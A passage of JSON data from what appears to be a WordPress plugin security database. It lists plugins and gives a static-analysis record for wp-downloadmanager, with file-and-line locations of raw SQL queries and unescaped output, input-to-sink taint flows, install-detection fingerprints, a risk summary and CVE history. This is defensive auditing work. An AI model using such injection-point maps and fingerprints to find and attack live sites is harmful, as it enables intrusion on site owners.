uploads directory exists and is writable)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Notes (Internal)\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Uninstall deletes a legacy transient \u003Ccode>kitgenix_document_manager_site_health\u003C\u002Fcode> for backwards compatibility, even though v1 does not set it.\u003C\u002Fli>\n\u003C\u002Ful>\n","Manage document downloads with stable links, version history, and private file access.",81,"2026-03-26T20:11:00.000Z","6.0","8.1",[274,21,239,275,276],"documents","private-files","stable-links","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fkitgenix-document-manager\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkitgenix-document-manager.1.0.0.zip",{"slug":280,"name":281,"version":282,"author":283,"author_profile":284,"description":285,"short_description":286,"active_installs":287,"downloaded":288,"rating":289,"num_ratings":290,"last_updated":291,"tested_up_to":16,"requires_at_least":292,"requires_php":18,"tags":293,"homepage":297,"download_link":298,"security_score":299,"vuln_count":300,"unpatched_count":29,"last_vuln_date":301,"fetched_at":31},"filester","File Manager Pro – Filester","2.0.2","Ninja Team","https:\u002F\u002Fprofiles.wordpress.org\u002Fninjateam\u002F","\u003Cp>Filester is a WP File Manager Pro plugin, but you can download and use it completely for free. It comes with all the \u003Cstrong>premium features\u003C\u002Fstrong> of other WordPress advanced file manager plugins out there.\u003C\u002Fp>\n\u003Cp>Filester helps you manage \u003Cstrong>WordPress configuration files\u003C\u002Fstrong>, while \u003Ca href=\"https:\u002F\u002F1.envato.market\u002FFileBird-Folders-Plugin\" rel=\"nofollow ugc\">FileBird\u003C\u002Fa> allows you to manage\u002Fupload\u002Fdownload \u003Cstrong>media library folders\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>With Filester – File Manager Pro, you can copy, paste, create an archive, download, upload, edit, delete, preview, duplicate, and get info of the WordPress configuration and directory files \u003Cstrong>without FTP access\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>This file manager plugin is dedicated to boosting your productivity in managing WordPress. All necessary file operations are fully provided and tested on a variety of servers and browsers.\u003C\u002Fp>\n\u003Cp>Another thing you will appreciate about it is the clean and compact UI\u002FUX, which makes editing and transferring directory files and folders extra fast.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Did you know?\u003C\u002Fstrong>\u003Cbr \u002F>\nMore than \u003Ca href=\"https:\u002F\u002Fwww.wordfence.com\u002Fblog\u002F2020\u002F09\u002Fmillions-of-sites-targeted-in-file-manager-vulnerability-attacks\u002F\" rel=\"nofollow ugc\">700,000 WordPress websites\u003C\u002Fa> were attacked during September 2020.\u003Cbr \u002F>\nMalicious bots are looking to exploit vulnerable versions of WP file manager plugins.\u003Cbr \u002F>\nFortunately, Filester comes with this vulnerability \u003Cstrong>fixed\u003C\u002Fstrong>!\u003Cbr \u002F>\nFilester poses no risk to you, so rest assured! 🤗\u003C\u002Fp>\n\u003Ch3>⚡️ FEATURES\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Drag & drop interface:\u003C\u002Fstrong> Easily move and arrange files\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Smart context menu:\u003C\u002Fstrong> Right-click on any files to make operations\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Manage files and folders:\u003C\u002Fstrong> Copy, move, upload, create folder\u002Ffile, rename, duplicate, etc.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Built-in advanced code editor:\u003C\u002Fstrong> Integrated development environment ACE Editor, CodeMirror, CKEditor, TinyMCE, and others\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Flexible configuration:\u003C\u002Fstrong> Access rights, uploadable file types\u002Fextensions, maximum file size limit, and more\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Create\u002Fextract archives:\u003C\u002Fstrong> .zip, .rar, .xz, .tar, .gzip\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Great UI\u002FUX design:\u003C\u002Fstrong> Clean, high-quality & productivity-driven \u003C\u002Fli>\n\u003Cli>\u003Cstrong>User authority settings:\u003C\u002Fstrong> File extensions to be locked, file visibility, root path access, .htaccess file \u003C\u002Fli>\n\u003Cli>\u003Cstrong>Edit media files:\u003C\u002Fstrong> Using Photopea & TUI Image Editor\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Multiple languages supported:\u003C\u002Fstrong> English, German, Spanish, Italian, French, Japanese, etc.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>RTL supported:\u003C\u002Fstrong> Hebrew, Arabic, Persian, Kurdish, etc.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🙌 OTHER FEATURES\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Local file system\u003C\u002Fli>\n\u003Cli>Simple client-server API based on JSON\u003C\u002Fli>\n\u003Cli>List and icon view\u003C\u002Fli>\n\u003Cli>Multi-root support\u003C\u002Fli>\n\u003Cli>Hidden files\u002Ffolders options\u003C\u002Fli>\n\u003Cli>Set hidden files for other users\u003C\u002Fli>\n\u003Cli>Root path for each user role\u003C\u002Fli>\n\u003Cli>Easy to navigate\u003C\u002Fli>\n\u003Cli>6 themes for your preferred interface\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🔑 HOW IT WORKS\u003C\u002Fh3>\n\u003Cp>Filester plugin helps you easily manage WordPress files so that you don’t have to access directories via FTP or cPanel.\u003C\u002Fp>\n\u003Cp>This plugin creates a new menu \u003Cstrong>File Manager\u003C\u002Fstrong> in your WordPress dashboard. From then on, you can view all server files, configuration, and media files on your current WordPress website.\u003C\u002Fp>\n\u003Cp>You can edit, copy, upload\u002Fdownload files\u002Ffolders to your server from File Manager section. This toolbar is similar to the settings in an FTP client. It allows you to preview, edit, upload, download, duplicate and delete files or folders.\u003C\u002Fp>\n\u003Cp>With Filester, it’s easy to modify the auto-update mechanism with each new version of WordPress. You can quickly \u003Cstrong>search for specific text or code\u003C\u002Fstrong> within your WordPress files and replace it efficiently.\u003C\u002Fp>\n\u003Cp>With built-in code editors, you can edit code files with syntax highlighting and code completion features for themes, plugins, and custom code snippets. It takes one click to download a plugin’s \u003Cstrong>ZIP file\u003C\u002Fstrong> to your local storage. It helps track changes made to files and revert to previous versions if needed.\u003C\u002Fp>\n\u003Cp>All webmasters can also \u003Ca href=\"https:\u002F\u002Fninjateam.org\u002Fdownload-wordpress-media-library\u002F\" rel=\"nofollow ugc\">download WordPress media library\u003C\u002Fa> using Filester download options as well.\u003C\u002Fp>\n\u003Ch3>🎏 COMPATIBILITY\u003C\u002Fh3>\n\u003Cp>Filester works seamlessly with all major WordPress themes, page builders, and website builders.\u003C\u002Fp>\n\u003Cp>💙 \u003Cstrong>Like Filester?\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Ffilester\u002Freviews\u002F?filter=5\" rel=\"ugc\">Share your experience\u003C\u002Fa> and empower other users to manage WordPress like a pro.\u003C\u002Fp>\n\u003Cp>👉 Check out NinjaTeam \u003Ca href=\"https:\u002F\u002Fninjateam.org\u002Fcategory\u002Ftutorials\u002F\" rel=\"nofollow ugc\">WordPress tutorials\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>CREDIT\u003C\u002Fh4>\n\u003Cp>Big thanks to elFinder – open-source file manager for web.\u003C\u002Fp>\n","Advanced File Manager and Code Editor. Best WordPress file manager without FTP access. No need to upgrade because this is PRO version.",100000,1371112,98,147,"2026-01-12T14:11:00.000Z","3.0",[294,239,23,295,296],"download-plugin","wordpress-file-manager","wp-file-manager","https:\u002F\u002Fninjateam.org\u002Ffilester","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffilester.2.0.2.zip",91,9,"2025-06-19 00:00:00",{"attackSurface":303,"codeSignals":410,"taintFlows":760,"riskAssessment":843,"analyzedAt":859},{"hooks":304,"ajaxHandlers":396,"restRoutes":397,"shortcodes":398,"cronEvents":409,"entryPointCount":56,"unprotectedCount":29},[305,310,314,318,321,324,327,330,333,336,341,345,349,353,357,360,365,368,372,376,380,384,388,392],{"type":306,"name":307,"callback":308,"file":53,"line":309},"action","plugins_loaded","downloadmanager_textdomain",36,{"type":306,"name":311,"callback":312,"file":53,"line":313},"admin_menu","downloads_menu",48,{"type":306,"name":315,"callback":316,"file":53,"line":317},"wp_enqueue_scripts","downloads_stylesheets",60,{"type":306,"name":319,"callback":320,"file":53,"line":200},"admin_enqueue_scripts","downloads_stylesheets_admin",{"type":306,"name":322,"callback":323,"file":53,"line":269},"admin_footer-post-new.php","downloads_footer_admin",{"type":306,"name":325,"callback":323,"file":53,"line":326},"admin_footer-post.php",82,{"type":306,"name":328,"callback":323,"file":53,"line":329},"admin_footer-page-new.php",83,{"type":306,"name":331,"callback":323,"file":53,"line":332},"admin_footer-page.php",84,{"type":306,"name":334,"callback":335,"file":53,"line":260},"init","download_tinymce_addbuttons",{"type":337,"name":338,"callback":339,"file":53,"line":340},"filter","mce_external_plugins","download_tinymce_addplugin",106,{"type":337,"name":342,"callback":343,"file":53,"line":344},"mce_buttons","download_tinymce_registerbutton",107,{"type":337,"name":346,"callback":347,"file":53,"line":348},"wp_mce_translation","download_tinymce_translation",108,{"type":337,"name":350,"callback":351,"file":53,"line":352},"query_vars","download_query_vars",131,{"type":337,"name":354,"callback":355,"file":53,"line":356},"generate_rewrite_rules","download_rewrite",140,{"type":306,"name":358,"callback":359,"file":53,"line":290},"wp_head","download_rss_link",{"type":306,"name":361,"callback":362,"priority":363,"file":53,"line":364},"template_redirect","download_file",5,162,{"type":306,"name":307,"callback":366,"file":53,"line":367},"downloadmanager_wp_stats",1261,{"type":337,"name":369,"callback":370,"file":53,"line":371},"wp_stats_page_admin_plugins","downloadmanager_page_admin_general_stats",1263,{"type":337,"name":373,"callback":374,"file":53,"line":375},"wp_stats_page_admin_recent","downloadmanager_page_admin_recent_stats",1264,{"type":337,"name":377,"callback":378,"file":53,"line":379},"wp_stats_page_admin_most","downloadmanager_page_admin_most_stats",1265,{"type":337,"name":381,"callback":382,"file":53,"line":383},"wp_stats_page_plugins","downloadmanager_page_general_stats",1266,{"type":337,"name":385,"callback":386,"file":53,"line":387},"wp_stats_page_recent","downloadmanager_page_recent_stats",1267,{"type":337,"name":389,"callback":390,"file":53,"line":391},"wp_stats_page_most","downloadmanager_page_most_stats",1268,{"type":306,"name":393,"callback":394,"file":53,"line":395},"widgets_init","widget_downloadmanager_init",1493,[],[],[399,403,406],{"tag":400,"callback":401,"file":53,"line":402},"page_download","download_page_shortcode",436,{"tag":404,"callback":401,"file":53,"line":405},"page_downloads",437,{"tag":20,"callback":407,"file":53,"line":408},"download_shortcode",445,[],{"dangerousFunctions":411,"sqlUsage":412,"outputEscaping":483,"fileOperations":754,"externalRequests":29,"nonceChecks":363,"capabilityChecks":755,"bundledLibraries":756},[],{"prepared":363,"raw":413,"locations":414},32,[415,419,421,424,426,428,430,432,434,436,439,441,442,445,447,449,451,453,455,457,459,461,463,465,467,469,471,473,475,477,479,481],{"file":416,"line":417,"context":418},"download-add.php",86,"$wpdb->query() with variable interpolation",{"file":50,"line":420,"context":418},204,{"file":50,"line":422,"context":423},240,"$wpdb->get_row() with variable interpolation",{"file":50,"line":425,"context":423},378,{"file":50,"line":408,"context":427},"$wpdb->get_var() with variable interpolation",{"file":50,"line":429,"context":427},446,{"file":50,"line":431,"context":427},447,{"file":50,"line":433,"context":427},448,{"file":50,"line":435,"context":427},449,{"file":50,"line":437,"context":438},477,"$wpdb->get_results() with variable interpolation",{"file":440,"line":56,"context":427},"download-rss.php",{"file":440,"line":300,"context":438},{"file":443,"line":444,"context":418},"uninstall.php",72,{"file":53,"line":446,"context":423},174,{"file":53,"line":448,"context":423},179,{"file":53,"line":450,"context":418},193,{"file":53,"line":452,"context":438},522,{"file":53,"line":454,"context":438},580,{"file":53,"line":456,"context":427},981,{"file":53,"line":458,"context":427},993,{"file":53,"line":460,"context":427},1005,{"file":53,"line":462,"context":438},1098,{"file":53,"line":464,"context":438},1152,{"file":53,"line":466,"context":438},1211,{"file":53,"line":468,"context":423},1315,{"file":53,"line":470,"context":427},1574,{"file":53,"line":472,"context":418},1577,{"file":53,"line":474,"context":418},1579,{"file":53,"line":476,"context":427},1587,{"file":53,"line":478,"context":418},1589,{"file":53,"line":480,"context":418},1591,{"file":53,"line":482,"context":418},1593,{"escaped":484,"rawEcho":485,"locations":486},161,146,[487,490,492,494,495,497,499,501,503,505,507,509,511,513,515,517,519,521,523,525,526,528,530,532,534,536,538,540,542,544,546,548,550,552,554,556,558,560,562,564,566,568,570,572,574,576,578,580,582,584,586,588,590,592,594,596,598,600,601,603,605,607,609,611,613,615,617,618,619,621,622,624,625,627,628,630,631,633,635,637,639,641,642,644,646,648,650,652,654,656,659,661,663,664,666,667,669,671,673,675,677,679,681,683,685,687,689,691,693,695,697,699,701,703,705,707,709,711,713,715,717,719,721,723,724,725,726,728,730,731,733,734,735,736,738,739,740,741,743,744,745,746,748,750,751,753],{"file":416,"line":488,"context":489},99,"raw output",{"file":416,"line":491,"context":489},102,{"file":416,"line":493,"context":489},103,{"file":416,"line":290,"context":489},{"file":50,"line":496,"context":489},244,{"file":50,"line":498,"context":489},245,{"file":50,"line":500,"context":489},246,{"file":50,"line":502,"context":489},247,{"file":50,"line":504,"context":489},253,{"file":50,"line":506,"context":489},254,{"file":50,"line":508,"context":489},255,{"file":50,"line":510,"context":489},256,{"file":50,"line":512,"context":489},271,{"file":50,"line":514,"context":489},273,{"file":50,"line":516,"context":489},274,{"file":50,"line":518,"context":489},285,{"file":50,"line":520,"context":489},324,{"file":50,"line":522,"context":489},326,{"file":50,"line":524,"context":489},336,{"file":50,"line":524,"context":489},{"file":50,"line":527,"context":489},340,{"file":50,"line":529,"context":489},344,{"file":50,"line":531,"context":489},348,{"file":50,"line":533,"context":489},352,{"file":50,"line":535,"context":489},380,{"file":50,"line":537,"context":489},382,{"file":50,"line":539,"context":489},391,{"file":50,"line":541,"context":489},395,{"file":50,"line":543,"context":489},399,{"file":50,"line":545,"context":489},403,{"file":50,"line":547,"context":489},407,{"file":50,"line":549,"context":489},411,{"file":50,"line":551,"context":489},415,{"file":50,"line":553,"context":489},419,{"file":50,"line":555,"context":489},423,{"file":50,"line":557,"context":489},427,{"file":50,"line":559,"context":489},479,{"file":50,"line":561,"context":489},524,{"file":50,"line":563,"context":489},525,{"file":50,"line":565,"context":489},526,{"file":50,"line":567,"context":489},527,{"file":50,"line":569,"context":489},528,{"file":50,"line":571,"context":489},529,{"file":50,"line":573,"context":489},530,{"file":50,"line":575,"context":489},531,{"file":50,"line":577,"context":489},532,{"file":50,"line":579,"context":489},533,{"file":50,"line":581,"context":489},538,{"file":50,"line":583,"context":489},552,{"file":50,"line":585,"context":489},561,{"file":50,"line":587,"context":489},570,{"file":50,"line":589,"context":489},573,{"file":50,"line":591,"context":489},576,{"file":50,"line":593,"context":489},581,{"file":50,"line":595,"context":489},583,{"file":50,"line":597,"context":489},588,{"file":50,"line":599,"context":489},591,{"file":50,"line":599,"context":489},{"file":50,"line":602,"context":489},602,{"file":50,"line":604,"context":489},611,{"file":50,"line":606,"context":489},634,{"file":50,"line":608,"context":489},636,{"file":50,"line":610,"context":489},658,{"file":50,"line":612,"context":489},662,{"file":50,"line":614,"context":489},666,{"file":50,"line":616,"context":489},670,{"file":51,"line":491,"context":489},{"file":51,"line":493,"context":489},{"file":51,"line":620,"context":489},124,{"file":51,"line":620,"context":489},{"file":51,"line":623,"context":489},126,{"file":51,"line":623,"context":489},{"file":51,"line":626,"context":489},134,{"file":51,"line":626,"context":489},{"file":51,"line":629,"context":489},136,{"file":51,"line":629,"context":489},{"file":51,"line":632,"context":489},160,{"file":440,"line":634,"context":489},15,{"file":440,"line":636,"context":489},27,{"file":440,"line":638,"context":489},29,{"file":440,"line":640,"context":489},31,{"file":440,"line":413,"context":489},{"file":440,"line":643,"context":489},33,{"file":440,"line":645,"context":489},38,{"file":440,"line":647,"context":489},39,{"file":440,"line":649,"context":489},40,{"file":440,"line":651,"context":489},41,{"file":440,"line":653,"context":489},42,{"file":440,"line":655,"context":489},43,{"file":657,"line":658,"context":489},"download-templates.php",92,{"file":657,"line":660,"context":489},120,{"file":657,"line":662,"context":489},123,{"file":657,"line":623,"context":489},{"file":657,"line":665,"context":489},129,{"file":657,"line":290,"context":489},{"file":53,"line":668,"context":489},156,{"file":53,"line":670,"context":489},793,{"file":53,"line":672,"context":489},795,{"file":53,"line":674,"context":489},802,{"file":53,"line":676,"context":489},804,{"file":53,"line":678,"context":489},819,{"file":53,"line":680,"context":489},849,{"file":53,"line":682,"context":489},851,{"file":53,"line":684,"context":489},864,{"file":53,"line":686,"context":489},866,{"file":53,"line":688,"context":489},875,{"file":53,"line":690,"context":489},877,{"file":53,"line":692,"context":489},886,{"file":53,"line":694,"context":489},888,{"file":53,"line":696,"context":489},896,{"file":53,"line":698,"context":489},898,{"file":53,"line":700,"context":489},907,{"file":53,"line":702,"context":489},909,{"file":53,"line":704,"context":489},983,{"file":53,"line":706,"context":489},995,{"file":53,"line":708,"context":489},1007,{"file":53,"line":710,"context":489},1139,{"file":53,"line":712,"context":489},1193,{"file":53,"line":714,"context":489},1252,{"file":53,"line":716,"context":489},1402,{"file":53,"line":718,"context":489},1419,{"file":53,"line":720,"context":489},1421,{"file":53,"line":722,"context":489},1453,{"file":53,"line":722,"context":489},{"file":53,"line":722,"context":489},{"file":53,"line":722,"context":489},{"file":53,"line":727,"context":489},1456,{"file":53,"line":729,"context":489},1457,{"file":53,"line":729,"context":489},{"file":53,"line":732,"context":489},1465,{"file":53,"line":732,"context":489},{"file":53,"line":732,"context":489},{"file":53,"line":732,"context":489},{"file":53,"line":737,"context":489},1468,{"file":53,"line":737,"context":489},{"file":53,"line":737,"context":489},{"file":53,"line":737,"context":489},{"file":53,"line":742,"context":489},1472,{"file":53,"line":742,"context":489},{"file":53,"line":742,"context":489},{"file":53,"line":742,"context":489},{"file":53,"line":747,"context":489},1476,{"file":53,"line":749,"context":489},1477,{"file":53,"line":749,"context":489},{"file":53,"line":752,"context":489},1486,{"file":53,"line":752,"context":489},6,11,[757],{"name":758,"version":39,"knownCves":759},"TinyMCE",[],[761,778,810,823,833],{"entryPoint":762,"graph":763,"unsanitizedCount":29,"severity":70},"\u003Cdownload-add> (download-add.php:0)",{"nodes":764,"edges":775},[765,770],{"id":766,"type":767,"label":768,"file":416,"line":769},"n0","source","$_POST",59,{"id":771,"type":772,"label":773,"file":416,"line":488,"wp_function":774},"n1","sink","echo() [XSS]","echo",[776],{"from":766,"to":771,"sanitized":777},true,{"entryPoint":779,"graph":780,"unsanitizedCount":29,"severity":70},"\u003Cdownload-manager> (download-manager.php:0)",{"nodes":781,"edges":805},[782,784,788,790,795,798,800,803],{"id":766,"type":767,"label":768,"file":50,"line":783},215,{"id":771,"type":772,"label":785,"file":50,"line":786,"wp_function":787},"get_row() [SQLi]",216,"get_row",{"id":789,"type":767,"label":768,"file":50,"line":783},"n2",{"id":791,"type":772,"label":792,"file":50,"line":793,"wp_function":794},"n3","query() [SQLi]",225,"query",{"id":796,"type":767,"label":797,"file":50,"line":783},"n4","$_POST (x39)",{"id":799,"type":772,"label":773,"file":50,"line":496,"wp_function":774},"n5",{"id":801,"type":767,"label":802,"file":50,"line":634},"n6","$_GET (x10)",{"id":804,"type":772,"label":773,"file":50,"line":583,"wp_function":774},"n7",[806,807,808,809],{"from":766,"to":771,"sanitized":777},{"from":789,"to":791,"sanitized":777},{"from":796,"to":799,"sanitized":777},{"from":801,"to":804,"sanitized":777},{"entryPoint":811,"graph":812,"unsanitizedCount":29,"severity":70},"\u003Cdownload-options> (download-options.php:0)",{"nodes":813,"edges":821},[814,817],{"id":766,"type":767,"label":815,"file":51,"line":816},"$_POST (x5)",16,{"id":771,"type":772,"label":818,"file":51,"line":819,"wp_function":820},"update_option() [Settings Manipulation]",51,"update_option",[822],{"from":766,"to":771,"sanitized":777},{"entryPoint":824,"graph":825,"unsanitizedCount":29,"severity":70},"\u003Cdownload-templates> (download-templates.php:0)",{"nodes":826,"edges":831},[827,830],{"id":766,"type":767,"label":828,"file":657,"line":829},"$_POST (x8)",35,{"id":771,"type":772,"label":818,"file":657,"line":819,"wp_function":820},[832],{"from":766,"to":771,"sanitized":777},{"entryPoint":834,"graph":835,"unsanitizedCount":29,"severity":70},"\u003Cwp-downloadmanager> (wp-downloadmanager.php:0)",{"nodes":836,"edges":841},[837,840],{"id":766,"type":767,"label":838,"file":53,"line":839},"$_GET (x3)",491,{"id":771,"type":772,"label":773,"file":53,"line":710,"wp_function":774},[842],{"from":766,"to":771,"sanitized":777},{"summary":844,"deductions":845},"The wp-downloadmanager plugin v1.69.1 presents a mixed security posture. While the static analysis shows a relatively small attack surface with no immediately identified unprotected entry points and a decent number of capability checks and nonces, concerns arise from the SQL query handling. A significant portion (86%) of SQL queries are not using prepared statements, which, combined with the presence of file operations and external HTTP requests (though none active), indicates a potential for SQL injection vulnerabilities if input is not rigorously sanitized.\n\nThe vulnerability history is a major red flag. The plugin has a substantial number of known CVEs, including two high-severity vulnerabilities. The types of past vulnerabilities, such as Path Traversal, Unrestricted Upload, XSS, and SSRF, are all serious and suggest recurring issues with input validation and sanitization. The fact that the last vulnerability was in 2026 (anachronistic, but indicating recent historical issues) further emphasizes the need for caution. While there are currently no unpatched vulnerabilities, the historical pattern is concerning.\n\nIn conclusion, the plugin exhibits good practices in terms of limiting its direct attack surface and implementing some security checks. However, the prevalence of raw SQL queries and the extensive history of critical and high-severity vulnerabilities, particularly those related to input validation and path manipulation, necessitate a cautious approach. Users should be aware of the past security issues and ensure they are running the latest patched versions.",[846,848,850,853,855,857],{"reason":847,"points":634},"High percentage of SQL queries without prepared statements",{"reason":849,"points":196},"History of 2 high severity CVEs",{"reason":851,"points":852},"History of 7 medium severity CVEs",14,{"reason":854,"points":223},"History of 1 low severity CVE",{"reason":856,"points":28},"Common vulnerability types indicate input sanitization issues",{"reason":858,"points":56},"Bundled library (TinyMCE) may have its own vulnerabilities","2026-03-16T18:23:11.579Z",{"wat":861,"direct":874},{"assetPaths":862,"generatorPatterns":867,"scriptPaths":868,"versionParams":869},[863,864,865,866],"\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Fdownload-css.css","\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Fdownload-admin-css.css","\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.js","\u002Fwp-content\u002Fplugins\u002Fwp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.min.js",[],[865,866],[870,871,872,873],"wp-downloadmanager\u002Fdownload-css.css?ver=","wp-downloadmanager\u002Fdownload-admin-css.css?ver=","wp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.js?v=","wp-downloadmanager\u002Ftinymce\u002Fplugins\u002Fdownloadmanager\u002Fplugin.min.js?v=",{"cssClasses":875,"htmlComments":876,"htmlAttributes":877,"restEndpoints":879,"jsGlobals":880,"shortcodeOutput":883},[],[],[878],"ed_wp_downloadmanager",[],[881,882],"QTags.addButton","QTags.insertContent",[884],"[download id=",{"error":777,"url":886,"statusCode":887,"statusMessage":888,"message":888},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fwp-downloadmanager\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":890,"versions":891},24,[892,897,905,914,926,937,950,962,978,993,1010,1027,1044,1061,1078,1095,1112,1129,1146,1163,1180,1197,1214,1231],{"version":6,"download_url":26,"svn_tag_url":893,"released_at":39,"has_diff":55,"diff_files_changed":894,"diff_lines":39,"trac_diff_url":895,"vulnerabilities":896,"is_current":777},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.69.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.69&new_path=%2Fwp-downloadmanager%2Ftags%2F1.69.1",[],{"version":91,"download_url":898,"svn_tag_url":899,"released_at":39,"has_diff":55,"diff_files_changed":900,"diff_lines":39,"trac_diff_url":901,"vulnerabilities":902,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.69\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.11&new_path=%2Fwp-downloadmanager%2Ftags%2F1.69",[903,904],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":107,"download_url":906,"svn_tag_url":907,"released_at":39,"has_diff":55,"diff_files_changed":908,"diff_lines":39,"trac_diff_url":909,"vulnerabilities":910,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.11.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.11\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.10&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.11",[911,912,913],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":915,"download_url":916,"svn_tag_url":917,"released_at":39,"has_diff":55,"diff_files_changed":918,"diff_lines":39,"trac_diff_url":919,"vulnerabilities":920,"is_current":55},"1.68.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.10.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.10\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.9&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.10",[921,922,923,924,925],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":133,"download_url":927,"svn_tag_url":928,"released_at":39,"has_diff":55,"diff_files_changed":929,"diff_lines":39,"trac_diff_url":930,"vulnerabilities":931,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.8&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.9",[932,933,934,935,936],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":938,"download_url":939,"svn_tag_url":940,"released_at":39,"has_diff":55,"diff_files_changed":941,"diff_lines":39,"trac_diff_url":942,"vulnerabilities":943,"is_current":55},"1.68.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-downloadmanager\u002Ftags\u002F1.68.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-downloadmanager%2Ftags%2F1.68.7&new_path=%2Fwp-downloadmanager%2Ftags%2F1.68.8",[944,945,946,947,948,949],{"id":66,"url_slug":67,"title":68,"severity":70,"cvss_score":71,"vuln_type":44,"patched_in_version":6},{"id":128,"url_slug":129,"title":130,"severity":41,"cvss_score":134,"vuln_type":136,"patched_in_version":133},{"id":86,"url_slug":87,"title":88,"severity":92,"cvss_score":93,"vuln_type":95,"patched_in_version":91},{"id":102,"url_slug":103,"title":104,"severity":41,"cvss_score":108,"vuln_type":110,"patched_in_version":107},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"id":117,"url_slug":118,"title":119,"severity":92,"cvss_score":93,"vuln_type":121,"patched_in_version":107},{"version":149,"download_url":951,"svn_tag_url":952,"released_at":39,"has_diff":55,"diff_files_changed":953,"diff_lines":39,"trac_diff_url":954,"vulnerabilities":955,"is_current":55},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.68.7.z